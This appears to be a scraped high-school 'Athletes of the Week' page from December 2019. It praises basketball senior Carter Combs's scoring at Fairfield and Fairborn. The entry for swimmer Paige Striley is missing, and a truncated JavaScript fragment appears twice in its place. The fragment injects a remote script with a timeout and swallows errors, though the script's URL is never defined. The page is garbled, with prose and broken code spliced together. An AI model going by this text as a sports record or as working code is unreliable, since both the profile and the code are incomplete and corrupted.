Athletes of the Week
Kemba Credit Union Athletes of the Week 12/16/2019-12/22/2019
Carter Combs
Senior, Boys Basketball
Carter played a prominent role in two West wins this week. He scored 15 points, which included making the final four free throws in the closing seconds of a down to the wire win at Fairfield on Friday. The following night he led the team with 20 points at Fairborn as West set a new school single game scoring record of ninety-nine points. At Fairborn Combs fired up eight field goals, including two treys, and two free throws and didn’t miss a shot.
Paige Striley
Sophomore, Swimming
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();